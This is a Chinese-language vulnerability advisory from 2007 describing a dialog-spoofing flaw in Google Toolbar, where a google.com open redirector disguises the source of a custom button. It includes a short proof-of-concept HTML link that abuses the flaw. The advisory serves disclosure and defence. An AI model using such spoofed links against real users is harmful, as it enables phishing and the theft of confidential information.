发布日期：2007-12-19
更新日期：2007-12-21

受影响系统：

Google GoogleToolbar 5 beta
Google GoogleToolbar 4

描述：

---

BUGTRAQ  ID: 26923

Google Toolbar是安装在浏览器上的搜索工具栏。

Google Toolbar的实现上存在漏洞，远程攻击者可能利用此漏洞诱使用户执行不安全的操作。

Google Toolbar提供了用于创建工具栏按键的API，按键信息一般都存储在一个XML文件中。如果要添加按键的话，工具栏用户要点击引用了按键的XML文件的特制链接。当用户点击链接时，就会出现一个对话框显示按键的下载来源、名称、描述、图标和一些隐私考虑等信息。

攻击者可以创建添加了打开重新定向器特制的URL（例如，在google.com - http://www.google.com/local_url?q= ）伪造“下载自”和“隐私考虑”部分所显示的域，诱骗用户添加并使用按键，这样用户就会信任该按键所提供的文件，或输入保密信息。在新的beta版工具栏中，攻击者还可以通过这种方式每隔几秒钟就提示用户点击一次按键。

<*来源：Aviv Raff （avivra@gmail.com）
  
  链接：http://aviv.raffon.net/2007/12/18/GoogleToolbarDialogSpoofingVulnerability.aspx
        http://secunia.com/advisories/28166/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=windows-1250">
  <meta name="generator" content="PSPad editor, www.pspad.com">
  <title></title>
  </head>
  <body>
    <a href="http://toolbar.google.com/buttons/add?url=http://www.google.com/local_url?q=http%3A//www.raffon.net/research/google/toolbar/gupdate.xml">Click here for a nice google search...</a>

  </body>
</html>

建议：

---

厂商补丁：

Google
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.google.com

浏览次数：2696
严重程度：0（网友投票）